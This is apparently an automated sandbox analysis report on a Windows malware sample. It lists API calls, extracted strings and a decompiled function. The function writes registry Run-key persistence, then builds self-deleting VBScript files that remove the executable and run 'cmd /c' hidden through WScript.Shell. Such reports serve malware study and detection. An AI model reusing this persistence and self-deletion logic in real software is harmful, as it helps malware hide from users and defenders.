                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                  • String ID: /stext "
                                  • API String ID: 1338134179-3856184850
                                  • Opcode ID: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                  • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                  • Opcode Fuzzy Hash: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                  • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407E37, Relevance: 140.3, APIs: 70, Strings: 10, Instructions: 326fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wcslen.MSVCRT ref: 00407E46
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                  • wcscmp.MSVCRT ref: 00407EE0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                  • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407F25
                                  • wcslen.MSVCRT ref: 00407F40
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                  • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407FC6
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(0041BA5C), ref: 00407FD3
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                  • wcslen.MSVCRT ref: 00408022
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                  • _wgetenv.MSVCRT ref: 0040804B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?,00415628,0041623C), ref: 004080B0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                  • exit.MSVCRT ref: 00408228
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                  • API String ID: 740851534-1662879639
                                  • Opcode ID: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                  • Opcode Fuzzy Hash: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085AC, Relevance: 138.6, APIs: 63, Strings: 16, Instructions: 308registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E004085AC(char _a4) {
				signed int _v5;
				char _v6;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				void* _v104;
				void* _v120;
				short _v640;
				void* _t63;
				char* _t65;
				WCHAR* _t68;
				char* _t69;
				char* _t71;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				signed int* _t79;
				char* _t80;
				char* _t81;
				signed int _t82;
				short* _t84;
				char* _t85;
				char* _t86;
				WCHAR* _t88;
				char* _t89;
				char* _t90;
				short* _t154;
				void* _t161;
				void* _t162;
				void* _t164;
				void* _t166;

				_t63 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t63 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t63 = E0041050F(_t63);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E00412BEE(_t63);
				}
				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, _t94, _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
				_t162 = _t161 + 0x1c;
				if(_t65 == 0) {
					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t65);
				_v5 = 1;
				_t68 = SetFileAttributesW( &_v640, 0x80);
				if(_t68 == 0) {
					_v5 = _v5 & _t68;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t68 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t68, 0x80);
				}
				_t69 =  &_v6;
				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
				_t71 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
				L0041416A();
				_t164 = _t162 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
				if(_v5 != 0) {
					_t88 =  &_v640;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
					_t89 =  &_v72;
					L0041416A();
					_t90 =  &_v24;
					L00414146();
					_t164 = _t164 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t154 = L"\"\n";
				_t74 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
				_t75 =  &_v72;
				L00414146();
				_t76 =  &_v56;
				L00414146();
				_t166 = _t164 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t76 != 0) {
					_t85 =  &_v72;
					L0041416A();
					_t86 =  &_v56;
					L00414146();
					_t166 = _t166 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t77 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
				_t79 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
				_t80 =  &_v24;
				L0041414C();
				_t81 =  &_v72;
				L0041414C();
				_t82 =  &_v56;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
				if(_t84 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
					if(_t84 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t84;
			}





































                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
